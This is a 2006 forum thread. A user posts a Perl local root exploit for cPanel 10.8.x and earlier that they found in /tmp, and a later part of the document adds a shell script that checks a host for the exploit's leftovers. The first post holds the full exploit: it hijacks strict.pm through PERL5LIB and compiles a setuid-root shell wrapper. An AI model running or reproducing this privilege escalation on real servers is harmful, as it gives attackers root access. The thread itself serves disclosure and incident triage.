cpwrap root exploit

Discussion in 'General Discussion' started by otsh, Oct 11, 2006.

  1. otsh

    otsh Member

    Found this today on my box in /tmp:


    #!/usr/bin/perl -w

    # 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
    # use strict; # haha oh wait..

    my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
    my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
    my $pwd = `pwd`;

    chomp $pwd;
    $ENV{'PERL5LIB'} = "$pwd";

    #if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
    if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
    if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }

    open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
    while(<CPWRAP>) {
    if(/REMOTE_USER/) { print "$cpwrap is patched.\n"; }
    }
    close (CPWRAP);

    open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
    print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
    print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
    print STRICT "system(\"/usr/bin/gcc Maildir.c -o /bin/Maildir\");\n";
    print STRICT "system(\"/bin/chmod 4755 /bin/Maildir\");\n";
    print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
    #print STRICT "system(\"chmod 4755 /tmp/lsh; chmod root:root /tmp/lsh; mv /tmp/lsh /bin/lsh\");\n";
    close (STRICT);

    system("$mysqlwrap DUMPMYSQL 2>/dev/null");

    if ( -e "/bin/Maildir" ) {
    system("/bin/lsh");
    }
    else {
    unlink "strict.pm";
    die "Failed\n";
    }
     
  2. securitydot

    securitydot Registered

    #2 securitydot, Oct 11, 2006
    Last edited: Oct 11, 2006
  3. otsh

    otsh Member

    Thankfully I was patched. Thanks for the heads up.
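
Added triage example, not part of the original thread and not cPanel tooling: it checks a host for the artifacts the script in the first post would leave behind, namely a strict.pm copy outside Perl's library path, setuid files at the drop paths the script names, and the REMOTE_USER string that the script itself treats as the sign of a patched cpwrap. The function names and the root-prefix argument are assumptions of this example.

```shell
#!/bin/sh
# Added example. Each function takes paths explicitly so the checks can run
# against the live system (prefix "") or a mounted disk image / test tree.

# Returns 0 if the cpwrap binary contains the string the posted script greps
# for. This mirrors the script's own "is patched" heuristic, nothing more.
cpwrap_has_marker() {
    grep -a -q 'REMOTE_USER' "$1" 2>/dev/null
}

# Prints every strict.pm found under the given directories. The real
# strict.pm lives in Perl's library path; a copy in /tmp or a home
# directory is what the PERL5LIB trick in the script relies on.
find_shadow_strict() {
    find "$@" -xdev -type f -name 'strict.pm' 2>/dev/null
    return 0
}

# Prints the script's drop paths (including the commented-out lsh variant)
# that exist under the prefix with the setuid bit set.
find_dropped_setuid() {
    root=$1
    for p in /bin/Maildir /bin/lsh /tmp/lsh; do
        [ -f "$root$p" ] && [ -u "$root$p" ] && echo "$root$p"
    done
    return 0
}

# Runs all three checks; returns 0 only if nothing suspicious was found.
triage() {
    root=$1
    status=0
    if cpwrap_has_marker "$root/usr/local/cpanel/bin/cpwrap"; then
        echo "cpwrap: REMOTE_USER marker present"
    else
        echo "cpwrap: marker missing or file unreadable"; status=1
    fi
    hits=$(find_shadow_strict "$root/tmp" "$root/home")
    [ -n "$hits" ] && { echo "shadow strict.pm: $hits"; status=1; }
    hits=$(find_dropped_setuid "$root")
    [ -n "$hits" ] && { echo "setuid drop: $hits"; status=1; }
    return $status
}
```

Source the file and call `triage ""` as root on the live system, or pass the mount point of an image. The posted script deletes strict.pm and Maildir.c after a successful run, so a clean result for those two does not rule out earlier use; the setuid check is the one that survives cleanup.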
     